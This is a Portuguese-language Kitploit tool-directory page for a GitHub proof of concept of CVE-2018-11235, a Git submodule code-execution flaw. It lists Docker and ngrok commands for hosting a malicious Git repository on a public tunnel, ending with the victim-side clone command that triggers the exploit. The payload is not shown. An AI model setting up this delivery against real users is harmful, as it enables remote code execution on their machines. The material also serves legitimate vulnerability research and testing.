Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration — CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuração | Kitploit
Ferramentas/GitHubGitHub/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubtwseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration

cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration

CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuração

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
2há 4 anosAinda não revisado

CVE-2018-11235-Git-Submodule-CE + Configuração do Docker Ngrok

PoC do CVE-2018-11235-Git e tunelamento com docker ngrok

Construir o Dockerfile

root@kitploit:~
$ docker build -t cve-2018-11235 .

Criar rede personalizada para ngrok

root@kitploit:~
$ docker network create myngroknet

Iniciar o servidor HTTP do Git

root@kitploit:~
$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235

Iniciar o servidor HTTP do Ngrok para o servidor Git

root@kitploit:~
$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN

Agora você pode acessar a API para encontrar o domínio atribuído:

root@kitploit:~
$ curl $(docker port www_ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}

PoC no servidor Git vulnerável

root@kitploit:~
$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git

Referências:

  • CVE-2018-11235 git RCE
  • CVE-2018-11235-Git-Submodule-CE
  • Exponha serviços de contêineres Docker na Internet usando a imagem docker do ngrok
  • wernight/ngrok
  • CVE-2018-11235 - PoC rápida e suja
Baixar ferramenta